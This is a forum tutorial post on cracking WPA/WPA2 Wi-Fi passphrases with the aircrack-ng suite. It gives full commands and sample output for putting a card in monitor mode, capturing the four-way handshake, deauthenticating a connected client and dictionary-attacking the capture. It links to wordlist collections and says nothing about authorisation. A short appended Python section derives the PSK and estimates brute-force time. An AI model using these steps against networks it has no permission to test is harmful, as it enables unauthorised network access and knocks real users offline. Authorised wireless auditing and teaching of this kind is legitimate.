mk (Administrators)
Posts: 276 | Join date: 2013-01-19 | Age: 33

Subject: Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng ] -- Mon Jan 21, 2013 11:44 pm
Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng ]

Note: This is part 1 of the tutorial, covering the bruteforcing technique to crack wpa/wpa2 networks. Part 2 is going to cover cracking wpa/wpa2 without bruteforcing, so stay updated with our forum. The tools required for this tutorial are provided at the bottom of this tutorial.

This tutorial will teach you about cracking wpa/wpa2 networks which use pre-shared keys. But before jumping directly to the tutorial, I guess you guys should know about WPA/WPA2 and the difference between WEP and WPA. If you don't have any idea on this topic, then I would suggest you read some articles about WPA/WPA2 and WEP; that's going to help you a lot.

Before starting, make sure airodump-ng shows the network having PSK authentication type; if not, then stop wasting your time cracking, because aircrack-ng can only crack pre-shared keys. I also got asked several times whether we can crack WPA like WEP, and the answer I gave was NO, because while cracking WEP a statistical method can be used to speed up cracking, but WPA only depends upon BRUTE-FORCING (there's an exception though, which I will be showing in Part-2 of cracking wpa/wpa2 networks). So here are the points you should note down:

1) The passphrase or password must be in the dictionary list you are going to use for brute-forcing.
2) The authentication methods of WPA and WPA2 networks are almost the same, so there is no difference between cracking WPA and WPA2.
3) You should be close enough to the network to send and receive wireless client packets.

The steps we are going to follow are:
- Put the wireless interface in monitor mode.
- Start airodump-ng to collect the authentication handshake.
- Use aireplay-ng to deauthenticate the wireless client, after the handshake is captured.
- Crack the key using a dictionary file by running aircrack-ng.

Putting the wireless interface in monitor mode

To put the card in monitor mode, run the following command:

    airmon-ng

Then the system will show this:

    Interface   Chipset          Driver
    wifi0       Atheros          madwifi-ng
    ath0        Atheros          madwifi-ng VAP (parent: wifi0)
    ath1        Atheros          madwifi-ng VAP (parent: wifi0)
    wlan0       Ralink 2573 USB  rt73usb - [phy0]

Enter the following command to start the wireless card in monitor mode (for mac drivers):

    airmon-ng start wlan0

Then the system will respond:

    Interface   Chipset          Driver
    wifi0       Atheros          madwifi-ng
    ath0        Atheros          madwifi-ng VAP (parent: wifi0)
    ath1        Atheros          madwifi-ng VAP (parent: wifi0)
    wlan0       Ralink 2573 USB  rt73usb - [phy0]
                                 (monitor mode enabled on mon0)

Enter the following command to start the wireless card in monitor mode (for other drivers):

    airmon-ng start ardha

Replace ardha with your interface name.

Now, finding a network using WPA/WPA2

In the step above, monitor mode has been enabled on mon0; note down your monitor-enabled interface. Then enter the following command (replace mon0 with your monitor-enabled interface):

    airodump-ng mon0

The system will respond:

    CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7

    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54  WPA2 CCMP   PSK  TestNet

    BSSID              STATION            PWR  Rate   Lost  Packets  Probe
    00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54     0      230

In the screen above, notice the "WPA handshake: 00:19:5B:52:AD:F7" in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Now, let's de-authenticate using aireplay-ng after the handshake is complete:

    aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0

The output should be:

    13:04:20  Sending DeAuth to station.   STMAC: [00:1C:BF:90:5B:A3]

Now, let's run aircrack-ng to crack the pre-shared key:

    aircrack-ng -w mypassword.lst -b 00:19:5B:52:AD:F7 psk*.cap

Where:
- -w mypassword.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
- *.cap is the name of the group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

If everything is working well and handshakes are found, this is what you are likely to get:

    Opening psk-01.cap
    Opening psk-02.cap
    Opening psk-03.cap
    Opening psk-04.cap
    Read 1827 packets.

    #  BSSID              ESSID    Encryption
    1  00:19:5B:52:AD:F7  testnet  WPA (1 handshake)

    Choosing first network as target.

If handshakes are not found, then:

    Opening psk-01.cap
    Opening psk-02.cap
    Opening psk-03.cap
    Opening psk-04.cap
    Read 1827 packets.

    No valid WPA handshakes found.

Now, aircrack-ng will start attempting to crack the pre-shared key. Depending on your computer speed and the size of the password file, cracking may take up to hours and even days.

If everything goes well, then this is what a cracked pre-shared key looks like:

    Aircrack-ng 0.8

    [00:00:00] 2 keys tested (37.20 k/s)

    KEY FOUND! [ 12345678 ]

    Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
                     B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

    Transient Key  : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
                     CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

    EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

And that's the end of the tutorial.

Download aircrack from: [members-only link]
Collection of wordlists (size: 8.49 GB): [members-only link]
Collection of wordlists (size: 1.9 GB): filesonic.com/folder/13545931
Or, you can use your own wordlists, if you already have one.
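An added example, not code from the post or from the Aircrack-ng project, showing what the wordlist run above is actually searching for: the "Master Key" that aircrack-ng prints is PBKDF2-HMAC-SHA1 of the passphrase salted with the SSID, and the 4096 iterations are why the rate sits at tens of thousands of keys per second. The helper functions turn the post's 37.20 k/s figure into a time estimate, which is the defender's side of point 1 (a passphrase outside the list is never found); the "password"/"IEEE" test vector is the one published in IEEE 802.11i, and the SSID/key values are the ones shown in the post.

```python
import hashlib


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit WPA/WPA2 PSK (the 'Master Key' aircrack-ng prints).

    IEEE 802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    Every candidate costs ~8192 SHA-1 compressions, which is what keeps a CPU
    cracker at tens of thousands of keys per second. The SSID is the salt, so a
    table of PSKs computed for one SSID says nothing about a network with another.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def wordlist_seconds(entries: int, keys_per_second: float) -> float:
    """Worst-case wall clock to exhaust a wordlist of `entries` candidates."""
    return entries / keys_per_second


def random_passphrase_years(alphabet: int, length: int, keys_per_second: float) -> float:
    """Years to exhaust every passphrase of `length` symbols from an alphabet of
    `alphabet` symbols at the given rate: the ceiling a wordlist run faces once
    the passphrase is random rather than a dictionary word."""
    return alphabet ** length / keys_per_second / (365.25 * 24 * 3600)


if __name__ == "__main__":
    # Values taken from the post: SSID "TestNet", recovered key "12345678", 37.20 k/s.
    rate = 37.20e3
    print("PSK for TestNet / 12345678        :", wpa_psk("12345678", "TestNet").hex())
    print("1,000,000-word list at 37.20 k/s  :", wordlist_seconds(1_000_000, rate), "s")
    print("random 8-char lowercase, years    :", random_passphrase_years(26, 8, rate))
    print("random 12-char mixed (62 symbols) :", random_passphrase_years(62, 12, rate))
```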